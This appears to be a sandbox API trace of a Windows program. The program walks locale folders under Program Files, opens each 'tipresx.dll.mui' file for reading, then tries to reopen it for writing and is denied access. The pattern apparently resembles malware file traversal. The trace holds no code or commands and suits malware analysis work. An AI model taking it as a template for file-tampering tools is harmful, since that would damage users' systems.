[0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0099.013] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.013] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.013] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0099.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0099.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.014] AreFileApisANSI () returned 1 [0099.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0099.014] AreFileApisANSI () returned 1 [0099.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0099.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 73 [0099.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.015] GetFileType (hFile=0x418) returned 0x1 [0099.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0099.015] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.015] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.015] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.015] CloseHandle (hObject=0x418) returned 1 [0099.015] AreFileApisANSI () returned 1 [0099.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0099.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 73 [0099.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.016] GetLastError () returned 0x5 [0099.016] GetLastError () returned 0x5 [0099.016] SetLastError (dwErrCode=0x5) [0099.016] GetLastError () returned 0x5 [0099.016] SetLastError (dwErrCode=0x5) [0099.016] GetLastError () returned 0x5 [0099.016] SetLastError (dwErrCode=0x5) [0099.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0099.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.016] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.016] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d0d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0099.016] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0099.017] AreFileApisANSI () returned 1 [0099.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX", lpUsedDefaultChar=0x0) returned 57 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.018] AreFileApisANSI () returned 1 [0099.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0099.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 57 [0099.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.018] GetLastError () returned 0x5 [0099.018] GetLastError () returned 0x5 [0099.018] SetLastError (dwErrCode=0x5) [0099.018] GetLastError () returned 0x5 [0099.018] SetLastError (dwErrCode=0x5) [0099.018] GetLastError () returned 0x5 [0099.018] SetLastError (dwErrCode=0x5) [0099.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0099.018] AreFileApisANSI () returned 1 [0099.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 57 [0099.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.018] GetLastError () returned 0x5 [0099.018] GetLastError () returned 0x5 [0099.018] SetLastError (dwErrCode=0x5) [0099.018] GetLastError () returned 0x5 [0099.019] SetLastError (dwErrCode=0x5) [0099.019] GetLastError () returned 0x5 [0099.019] SetLastError (dwErrCode=0x5) [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.019] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0099.019] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0099.019] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.019] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2a46df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2a46df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2a46df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0099.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.020] AreFileApisANSI () returned 1 [0099.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0099.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 